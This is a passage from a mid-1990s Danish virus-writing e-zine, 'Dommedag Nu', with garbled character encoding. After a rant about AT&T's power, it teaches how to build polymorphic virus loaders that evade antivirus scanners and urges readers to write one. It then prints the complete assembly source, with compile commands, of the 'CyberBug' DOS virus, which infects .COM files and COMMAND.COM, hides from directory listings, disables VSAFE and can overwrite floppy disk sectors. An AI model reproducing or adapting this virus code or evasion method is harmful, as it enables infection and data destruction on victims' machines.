har ogs† gjort store fremskridt indenfor teleudstyr - AT&T har via deres AT&T
Microelektronik produceret over 40 forskellige AT&T produkter designet for
brugerens benyttelse, s†som tr†dl›se samt ledning-telefoner, samt telefon-
svarer, der bliver exporteret til hele 24 lande, samt EDB-l›sninger til s†vel
sm† som st›rre virksomheder, som ligger b†de i alm. systemmet samt PBX-
systemmer der er blevet solgt til over 45 lande.
AT&T har 50 distribut›rer over hele jorden, hvor AT&T Microelektronik har et
netv‘rk med 15 salgs- og teknisk marketing kontorer. AT&T EasyLink er ogs†
blevet sat i kraft med elektronisk beskeder der rykker rundt i hele verden,
samt med Telex-systemmer, sat op over hele kloden, for absolut kommunikation.

AT&T INFORMATIONER

- i 1991 havde AT&T over 50,000 ansat udenfor deres kontor i USA..

þ AT&T er aktive i omkring 100 lande rundt om jorden, og laver
forretninger i 120.
þ AT&T har 34 fabriker udenfor USA
-Hvilket er 16 i Europa, 12 i Asien, 5 i Latin Amerika og 1 i Canada.
þ AT&T har 1 fabrik i Sinapore vor 3,270 personer er ansat, her bliver
der produceret AT&T's tr†dl›se telefoner, samt produktionen af
Sikkereds-systemmer.
-En fabrik i Bangkok, Thailand ar 850 personer der arbejder p† at
lave telefoner samt telefon-svarer systemmer
-En fabrik i Guadalajara, Mexico som procedure telefonsvarer-
systemmer.
-AT&T Microelektronik laver produkter i b†de Thailand, Spanien,
Mexico, Singapore og England.
þ AT&T Kapital Corp., har $6 billioner kroner i pungen, med finansering
af b†de AT&T og ikke-AT&T produkter samt servicer i Canada og Europe.

AT&T har gennem tiden lavet kontrakter med disse lande, om at levere telefon-
linier over hele landet:

BELGIUM BULGARIA CZECHOSLOVAKIA
FRANCE GERMANY GREAT BRITAIN
ITALY THE NETHERLANDS POLAND
SPAIN SWITZERLAND ASIA
BRUNEI HONG KONG INDIA
INDONESIA JAPAN CHINA
PHILIPPINES SINGAPORE SOUTH KOREA
SRI LANKA TAIWAN THAILAND
THE CARIBBEAN CENTRAL AMERICA MEXICO
SOUTH AMERICA BRAZIL CHILE
VENEZUELA CANADA MIDDLE EAST
EGYPT KUWAIT SAUDI ARABIA

Dette er s†dan set alle st›rre lande, dog er denne liste fra en officiel kilde
fra AT&T udgivet i 1992, der vil nok v‘re flere lande nu, da AT&T hele tiden er
p† farten for at blive st›rre og st›rre.

Som det ses, er AT&T ikke stoppet ved bare at levere telefon-linier, men de er
ogs† en af de st›rre producenter af EDB-l›sninger til virksomheder, samt
sikkerheds-systemmer til st›rre virksomheder - De er s†gar igang med at bygge
en kreds uden om den private computerscene, med billige og samtidig kraftfulde
computer, allerede nu er computer-leverand›ren til KTAS nemlig AT&T...

Om bare nogle f† †r er monopolet p† det danske telefon-net til r†dighed,
hvilket ikke har g†et fordi AT&T's ›re stille. AT&T er ogs† den mest sand-
synlige tele-virksomhed der vil modtage monopolet p† de danske telefonlinier,
fordelen er dog at alle lokale-telefon opkald vil blive gratis, men stadig
bliver det en fordel for AT&T der vil f† magten over et land mere end de nu-
tidig har..

AT&T har allerede magt nok til at kunne lukke mindre lande totalt ned, og hvis
de bliver for store, kan de s†gar l‘gge hele verden for deres f›dder. Med den
fart AT&T har p†, kan man godt mist‘nke koncernen at p† et tidspunkt at overg†
til et meget og endda for stort penge-syndikat, hvilket b†de kontrollere b†de
komunikationen, sikkerheden samt kontakten, hvis AT&T lukker ned for bare et
land, vil helvede s†dan set g† l›s, da man helt mister alt komunikation til det
land..

Sagt p† en anden m†de, at hvis et firma f†r nok magt over komunikationen vil
selv den mindste manipulation af komunikationen volde verden store problemmer,
en manipulation af komunikationen vil endda kunne forudsage krige over hele
orden, da ingen kan f›le sig sikker p† at det der kommer ud i den anden ende af
r›ret passer 100 % til det der rent faktisk bliver sagt i den anden ende...

Som sagt : Den der kontrollere komunikationen, kontrollere verden.....

þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ

En Polymorphic Virus
Af Clive Sharp

1. Generelt
Mange af jer har sikkert h›rt om polymorphic virus'er, men det er de
f‘rreste der ved, hvordan man laver en, som er andet en bare at kryptere
virus'en, som jo ikke altid er specielt effektivt, for at sige det p‘nt.

2. Anti-virus
Men f›rst skal vi se p† hvad anti-virus programmerne kigger efter, n†r
de pr›ver at stoppe en virus:

þ Kender anti-virus programmet denne virus. Dette g›res ved at
s›ge efter nogle offentligt kendte strenge, som er unikke for
pr‘cis denne virus. Nogle strenge kunne f.eks. v‘re:

þ "Made by Dark Avenger",

þ "141$Flu" (Dette er den aktuelle streng fra Cascade).

Dvs. at hvis man har en krypteret virus, hvor der aldrig er
den samme streng at s›ge efter, s† kan et anti-virus program
ikke finde denne virus. Der er desv‘rre ikke rigtigt, for at
dekryptere virusen, skal man bruge et lille program (en "load-
er"), og s† kan anti-virus programmet bare s›ge p† denne "loa-
der". Dette vil vi se meget mere til om lidt.

Problemet med at s›ge efter strenge er, at anti-virus folkene
jo skal have en kopi af programmet, f›r de kan finde en streng.
Dvs. der vil g† noget tid f›r der kommer et anti-virus program
der kan finde ens virus, ligemeget om den er krypteret eller
ej.

þ Nogle anti-virus programmer tager et "billede" af din harddisk
hvor den kan se hvis nogle af filerne vokser (et tydeligt tegn
p† at man har en virus).

þ Nogle virus scannere kigger hukommelsen igennem efter mist‘nk-
elige rutiner (DOS interrupt) o.s.v. Dette er dog de f‘rreste,
da de er temmeligt ustabile (til vores fordel).

þ En ny slags virus scanner er kommet fra Dr. Solomon's S&S Int-
ernational. Den hedder: "Generic Decryption Engine", og den g›r
f›lgende (meget kort): Hvis den finder noget der kunne v‘re en
krypteret virus, dekryptere den virus'en (ved hj‘lp af "Fuzzy
Logic"), og kan derfor finde en del af de polymorphic viruser
der er "p† markedet" idag.

3. En "normal" virus
Derefter skal vi se p†, hvad en "standart" virus er opbygget af. Dette
kan virke lidt element‘rt for nogle af jer, men jeg vil gerne have, at selv de
slemmeste WaR3z D0dEz forst†r dette, derfor:

þ En "dropper", dvs. det program der bringer virusen ind i din
computer, men ikke selve virusen. Dette kan v‘re et special
lavet program, eller bare nogle tilf‘ldige WaR3Z.

þ Overtagelse af systemet (dette har ikke nogen videre interesse
for os, s† det vil vi ikke uddybe n‘rmere).

þ Kryptering/dekryptering (en "loader"). Mange tror, at er en
virus krypteret, s† er den polymorphic og kan ikke findes af
anti-virus programmer. Begge dele er forkert! Dette vil vi se
meget mere til senere.

þ Anti-antivirus [Retro]. De lidt mere avancerede virus'er chec-
ker om der er nogle anti-virus programmer residente i hukommel-
sen, eller om der ligger nogle scannere p† harddisken. Hvis de
finder nogle antivirus programmer, bliver disse "sl†et fra",
eller p† andre m†der omg†et. (Dette vil ikke blive n‘rmere
uddybet her).

þ Derefter l‘gger virusen sig ned i boot-sektoren eller i .com/
.exe filer. Dette vil ikke blive beskrevet n‘rmere.

þ De fleste viruser har ogs† en "payload", som f.eks kan v‘re at
slette hele din harddisk, eller spille en lille melodi. Dette
har ingen interesse for os.

Dette var en meget kort gennemgang af hvordan en virus virker, og jeg
h†ber at den ikke var alt for overfladisk, men da dette jo handler om polymorp-
hic virus'er, er det kun det lille "loader" program, der har vores interesse.

4. "Loaderen"
For at se forskellen p† en krypteret virus, og en "normal" ikke krypt-
eret virus er her to illustrationer:

a. ÉÍÍÍÍÍÍÍÍÍ»
º º
º º
º º
º º
º º
º Kode º En IKKE krypteret virus.
º º
º º
º º
º º
º º
ÈÍÍÍÍÍÍÍÍÍ¼

b. ÉÍÍÍÍÍÍÍÍÍ»
º º
º"LOADER" º
º º
ÌÍÍÍÍÍÍÍÍÍ¹
º Kryp- º
º teret º En krypteret virus.
º kode º
º º
º º
º º
º º
ÈÍÍÍÍÍÍÍÍÍ¼

Alle burde nu have forst†et, at det er "loaderen" der er problemet,
da man kan have den vildeste kryptering, men hvis man bruger den samme "load-
er" s† hj‘lper det bare ikke. "Loaderen" skal g›res polymorphic.

5. The polymorphic loader
Det vi skal g›re, for at g›re vores virus polomorphic er, at f† vores
"loader" til at muterer. Det g›res p† f›lgende m†de:

þ For hver kommando vi har i vores "loader" (dekrypter), finder
vi nogle andre kommandoer, som resulterer i, at de scan strenge
der bruges, ikke l‘ngere er korrekte, f.eks.:

þ INC DI bliver kan blive til:
ADD DI,1 eller til ADD DI,3 - SUB DI,2 o.s.v.
Resultatet er, at den samme kommando bliver udf›rt
(registeret DI bliver 1 st›rre), men p† en forskellig
m†de hver gang!

Der kan ogs† skiftes mellem de registrer der er i computeren,
da det ogs† giver nye scan strenge.

Det vil sige, at hver gang er der 3-5 muligheder for at erstatte den
f›rste kommando, 3-5 muligheder for at erstatte den 2 kommando o.s.v.
Desv‘rre er det rimeligt nemt for anti-virus programmerne at lave lidt
statistisk regning, og med h›j sansynlighed at sige: her er en virus. Men det
problem kan ogs† fikses, nemlig med "Noise Bytes".

þ "Noise Bytes" er nogle kommandoer, som ikke har nogen betyd-
ning for udf›relsen af vores program, men som virker forvir-
rende, og som g›r det sv‘rere at lave statistisk regning p†
vores virus. Nogle kommandoer kan f.eks v‘re:

þ CLI (Clear Interrupt Flag)
STI (Set Interrupt Flag)
NOP (No Operation)

þ MOV DI,12 (Forudsat at vi ikke bruger DI)
MOV CX,1234 (Forudsat at vi ikke bruger CX)
O.S.V.

Det vil sige, at n†r man har 3-5 (eller flere) funktioner, som g›r det
samme, og bruger et variabelt antal "Noise Bytes", s† har man en Polymorphic
virus.

6. Forskellige former for viruser
Her til sidst vil jeg vise en lille oversigt, over div. former for
viruser:

þ En standart, ikke krypteret virus:

84 85 4D 25 14 5E 8F 65 07 82 6A 4C 88 A9 B2 65 E1 38 3B AA 8D
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
³
Normale kommandoer ÄÄÄÄÄÄÄÄÄÄÄÙ

þ En standart, krypteret virus:

87 45 2A 78 3D 6B 76 AB XX XX XX XX XX XX XX XX XX XX XX XX XX
³ ³ ³ ³
ÀÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
³ ³
"Loader" ÄÄÙ ³
Krypteret data ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

þ En semi-Polymorphic virus:

"Loader" ÄÄ¿
³
ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄ¿
³ ³
87 45 3D YY YY YY 74 AB XX XX XX XX XX XX XX XX XX XX XX XX XX
³ ³ ³ ³
ÀÄÄÄÂÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
³ ³
"Noise Bytes"Ù ³
Krypteret data ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

þ En Polymorphic virus:

"Loader" ÄÄ¿
³
ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄ¿
³ ³
ZZ ZZ ZZ YY YY YY ZZ ZZ XX XX XX XX XX XX XX XX XX XX XX XX XX
³ ³ ³ ³ ³ ³ ³ ³
ÀÄÄÄÂÄÄÙ ÀÄÄÄÂÄÄÙ ÀÄÂÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
³ ³ ³ ³
Var. funk. ³ ³ ³
"Noise Bytes"Ù ³ ³
Variable funktioner Ù ³
Krypteret data ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Med variable funktioner (var. funk.) menes der selvf›lgeligt
f›romtalte metode til at mutere loaderne, med forskellige
kommandoer, som g›r det samme.

7. Konklusion
For at g›re en virus 100% Polymorphic skal den have:

þ Et variabelt antal "Noise Bytes".

þ Flere forskellige m†der at udf›re en kommando p†.

þ Brugen af flere forskellige registre.

þ Variabel l‘ngde ("loader" og event. krypteret data).

þ Forskellig kryptering af data'en.

Jeg h†ber, at dette har hjulpet dem, der ikke vidste hvordan en Poly-
morphic virkede, s† nu skal du bare lave en......

þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ

Hvad vil fremtiden bringe for Dommedag Nu?
Af Clive Sharp

I den n‘rmeste fremtid vil der ske mange ‘ndringer med Dommedag Nu /
SMERSH. Vi regner med, at efter Dommedag Nu nr. 5. (som sandsynligvis vil blive
released til The Party i julen 1995), s† stopper vi enten bladet, eller s† ‘nd-
re vi bladet til en slags "nyhedsbrev", som s† vil udkomme oftere, og i mindre
st›rrelse (5 - 20 K), og kun omhandlende (ca.) et emne. Alt dette kommer selv-
f›lgeligt an p†, hvor meget materiale vi f†r fra alle jer k‘re l‘sere, da vi
ikke selv magter at producere nok materiel til et blad i denne st›rrelse (da vi
jo ogs† har et liv at leve ved siden af Dommedag Nu).

Vi regner med, at PLAN B g†r ned i l›bet af max. 1-2 m†neder, men det
vil komme op igen (grunden er at vores SysGud, Deja-Vu, har nogle, hmm "Person-
lige problemer"), men imens vil Darkside Connection v‘re vores "hovedkvarter".

I Dommedag Nu nr. 5. f†r vi en masse sp‘ndende nye ting at vise jer,
det skyldes ikke mindst, at SMERSH har f†et nogle nye medlemmer, som rykker, p†
mange omr†der, s† det skal nok blive et sp‘ndende blad. Desuden vil Danmarks
Super-Virus-Koder, Darkman, lave en polymorphic engine til os, en s†kaldt
DDN-M (hmmm). Den skal nok v‘re v‘rd at vente p†.

Ellers vil vi bare anbefale alle jer der er interesseret i HPV, at v‘re
til The Party (julen 1995), for selvom at det er et WaR3z party, s† er det en
god mulighed for alle HPV folk at m›des. V‘r der!

þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ

CyberBug v. 1.00
Af TorNado (Indledning af Clive Sharp)

Ja, s† er den her. Bladets f›rste virus (bortset fra Quicksilver
virus'en, ikke Deja-Vu?). Det er ellers imod vores politik, at have artikler i
bladet, som ikke skrevet p† dansk, men vi har diskuteret lidt frem og tilbage,
og er n†et til den konklusion, at det vil lyde dumt, og v‘re kraftigt menings-
forstyrrende, at overs‘tte det til dansk, s† i m† leve med det, som det er.

;============================================================================
;
; Virus Name : CyberBug v. 1.00
; Length : 757 bytes
; Author : TorNado
; Origin : Denmark 1995
;
; Description : -- Resident .COM infector ( 4bh = execute )
; -- File stealth 11h / 12h find first / find next
; -- XOR - Encryption
; -- Intercept INT24 ( Critical Error Handler )
; -- Anti-Debugging
; -- Saves Time / Date / Attributes
; -- Infect COMMAND.COM
; -- Create file cyberbug.bat ( 3ch = file create )
; the BATCH file will contain one single line which
; is " echo > clock$ "
; -- Remove VSAFE from memory
; -- Change drive to A:\ at a bad time (nuke tracks)
;
; To Compile : -- TASM /m2 cyberbug.asm
; TLINK /t cyberbug.obj
;
;============================================================================

cyberbug segment
assume cs:cyberbug,ds:cyberbug,es:cyberbug
org 100h

start: call delta

vir_size equ codeend-start

delta: call $+3
int 1h
call fuck_tbscan
call deltaOFF

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Get delta offset and decrypt virus
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

deltaOFF: pop bp
sub bp,offset deltaOFF

call encrypt_decrypt ;decrypt virus

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Remove VSAFE, make cleaning impossible and drop program ( cyberbug.bat )
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

begin: call vsafe
call anti_debug
call drop_program
jmp short doit

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Confuse TBSCAN ( no flags on infected files at all !! )
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

fuck_tbscan: mov ax,0305h ; keyb i/o
xor bx,bx
int 16h
ret

anti_debug: mov cx,09ebh
mov ax,0fe05h
jmp $-2
add ah,03bh
jmp $-10
int 21h
ret

go_resident: mov ax,[si]
mov es:[di],ax
mov ax,[si+2]
mov es:[di+2],ax

cli ; Disable interrupts
mov ds:[si],bx
mov ds:[si+2],es
sti ; Enable interrupts
ret

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Prepare virus to go resident hook some memory
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

doit: mov cx,es
dec cx
mov es,cx

mov bx,es:[03h]

mov dx,offset codeend-offset start
mov cl,4
shr dx,cl
add dx,4

mov cx,es
inc cx
mov es,cx

sub bx,dx
mov ah,4Ah
int 21h ; do it

jc do_work ; jump to ok
dec dx

mov ah,48h ;allocate enough mem for virus
mov bx,(vir_size+15)/16
int 21h
jc do_work ; jump to ok

dec ax ;ax-1 = MCB
mov es,ax
mov word ptr es:[1],8 ;Mark DOS as owner

mov si,offset offset start
add si,bp
sub ax,0Fh
mov es,ax
mov di,0100h
mov cx,offset codeend-offset start
cld
rep movsb
xor ax,ax
mov ds,ax
mov di,offset oldint21
mov si,084h
mov bx,offset virusint21

call go_resident

do_work: push cs
pop es
push es
pop ds
mov di,0100h
mov si,offset buffer
add si,bp
movsw
movsb
pop cx
pop ax
xor dx,dx
push dx
xor bp,bp
xor si,si
xor di,di
mov bx,0100h
push bx
xor bx,bx
retn

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; If u change to drive A:\ ther is a little chance it might get fucked up!!
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

read_floppy: push ax bx cx dx bp si di ds es

cmp dl,0
je floppy_time
jne runforit

floppy_time: mov ah,2ch
int 21h

cmp cl,55 ; minute = 55 ?
jge kill_floppy
jmp runforit

kill_floppy: cli
cwd
mov cx,255
int 26h
sti

runforit: pop es ds di si bp dx cx bx ax
jmp function21

virusint24 proc far
mov al,0
iret
virusint24 endp

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; FCB stealth no file size change on infected files in DIR listing
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
FCB_stealth: pushf
push cs
call function21

cmp al,00
jnz dir_error

push ax bx es
mov ah,51h ; Get active PSP to
int 21h ; es:bx
mov es,bx
cmp bx,es:[16h]
jnz error_stealth
mov bx,dx
mov al,[bx] ; al = current drive
push ax
mov ah,2fh ; get dta area
int 21h
pop ax
inc al
jnz normal_fcb

ext_fcb: add bx,7h
normal_fcb: mov ax,es:[bx+17h]
and ax,1fh
xor al,01h
jnz error_stealth

and byte ptr es:[bx+17h],0e0h ; substract virus len
sub es:[bx+1dh],(vir_size)
sbb es:[bx+1fh],ax

error_stealth: pop es bx ax

dir_error: iret

jmp_read_floppy:jmp read_floppy

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Check for every execution that is made look for .COM files
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

virusint21 proc near

cmp ah,4bh ; Check for execution
je infectCOM

cmp ah,11h ; FCB find first
je FCB_stealth

cmp ah,12h ; FCB find next
je FCB_stealth

cmp ah,0eh ; Change Drive?
je jmp_read_floppy

virusint21 endp

function21: jmp dword ptr cs:[oldint21]
iret

jmpforme: jmp popALL

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Infection routine clear attributes, get time and write and encrypted copy
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

infectCOM: push ax bx cx dx bp si di ds es

intercept24: push ds
push dx

mov ax,3524h
int 21h
mov word ptr cs:[save_int24],bx
mov word ptr cs:[save_int24+2],es

push cs
pop ds
mov dx,offset virusint24
mov ax,2524h
int 21h

pop dx
pop ds

mov ax,4300h
int 21h

mov word ptr cs:[save_attrib],cx
jc jmpforme

mov ax,4301h
xor cx,cx
int 21h

mov ax,3d02h
int 21h

push ds
push dx
push cs
pop ds
mov bx,ax

mov ax,5700h
int 21h

mov cs:[save_time],cx
mov cs:[save_date],dx

mov ah,3fh
mov dx,offset buffer
mov cx,3
int 21h
cmp word ptr cs:[buffer],'ZM' ; Check if EXE file
je close

mov ax,4202h ; move file pointer
call f_pointer

sub ax,offset codeend-offset start+3
cmp ax,word ptr cs:[buffer+1]
je close
add ax,offset codeend-offset start
mov word ptr cs:[new_jmp+1],ax

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Get a random number from DOS time and use it as encryption key
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

mov ah,2ch ;get random number from time
int 21h
mov word ptr ds:[enc_value],dx ;store it
mov ax,08d00h
mov es,ax
mov di,100h
mov si,di

mov cx,(vir_size+1)/2
rep movsw
push es
pop ds
xor bp,bp

call encrypt_decrypt ;and encrypt

mov ah,40h ;write it to file
mov cx,vir_size
mov dx,offset start
int 21h

push cs
pop ds

jc close

mov ax,4200h
call f_pointer

mov ah,40h
mov cl,3
mov dx,offset new_jmp
int 21h

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Save original time / date / attributes and close the file
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

close:
stealth_marker: mov ax,5701h
mov dx,cs:[save_date]
mov cx,cs:[save_time]
and cl,0e0h ; stealth marker "value"
inc cl
int 21h

mov ah,3eh ; Close file
int 21h
pop dx
pop ds

mov ax,4301h ; restore old attrib
mov cx,word ptr cs:[save_attrib]
int 21h

push ds ; restore int24
pop ds
mov ds,cs:[save_int24+2]
mov dx,cs:[save_int24]
mov ax,2524h
int 21h

popALL: pop es ds di si bp dx cx bx ax
jmp function21

f_pointer: cwd
xor cx,cx ; clear CX
int 21h ; do it
ret

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Lets take down VSAFE from memory so it dosen't complain !!
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

vsafe: mov ax,0fa01h
mov dx,5945h
int 21h
ret

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; This is the part that drops a small BATCH file in current dir
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

drop_program: lea dx,[bp + offset filename] ; this creates our
push ds ; little signature
push cs
pop ds
mov ah,3ch
mov cx,3
int 21h
jc no_drop

xchg ax,bx
mov ah,40h
mov cx,(drop_end - drop_start)
lea dx,[bp + offset drop_start]
int 21h

mov ah,3eh
int 21h

no_drop: pop ds
ret

drop_start:

evil db 'echo > clock$',0

drop_end:

virusname db '[ CyberBug v. 1.00 ]'
author db '[ made by TorNado DK ]'

filename db 'Cyberbug.bat',0

save_time dw 0
save_date dw 0
save_attrib dw 0

oldint21: dd ?

save_int24 dw 2 dup (?)

buffer db 90h,0cdh,20h
new_jmp db 0e9h,00h,00h

enc_end:

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; End of encryption the code below this point is unencrypted
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

enc_value dw 0

encrypt_decrypt:mov dx,word ptr ds:[bp+enc_value]
lea si,[bp+doit]
mov cx,(enc_end-doit)/2

xor_loop: xor word ptr ds:[si],dx
inc si
inc si
loop xor_loop
ret

codeend:

cyberbug ends
end start

þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ

Nyheder (taget, stort set, fra den Danske dagspresse).
